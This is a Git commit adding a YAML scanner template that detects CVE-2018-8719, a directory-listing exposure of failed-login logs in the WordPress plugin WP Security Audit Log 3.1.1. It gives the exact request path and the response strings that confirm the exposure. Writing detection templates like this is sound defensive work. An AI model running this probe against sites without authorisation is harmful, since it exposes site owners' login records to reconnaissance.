Merge pull request #2500 from LogicalHunter/temp-4

Added CVE-2018-8719.yaml Template
patch-1
Prince Chaddha 2021-08-31 16:30:09 +05:30 committed by GitHub
commit 960a568ef8
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 30 additions and 0 deletions

View File

@ -0,0 +1,30 @@
id: CVE-2018-8719
info:
name: WordPress Plugin WP Security Audit Log 3.1.1 - Information Disclosure
author: LogicalHunter
severity: medium
description: Access to wp-content/uploads/wp-security-audit-log/* files is not restricted. For example, these files are indexed by Google and allows for attackers to possibly find sensitive information
reference:
- https://www.exploit-db.com/exploits/44371
- https://vuldb.com/?id.115817
- https://www.cvedetails.com/cve/CVE-2018-8719/
tags: wordpress,wp-plugin,cve,cve2018,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "[TXT]"
- ".log"
- "Index of"
condition: and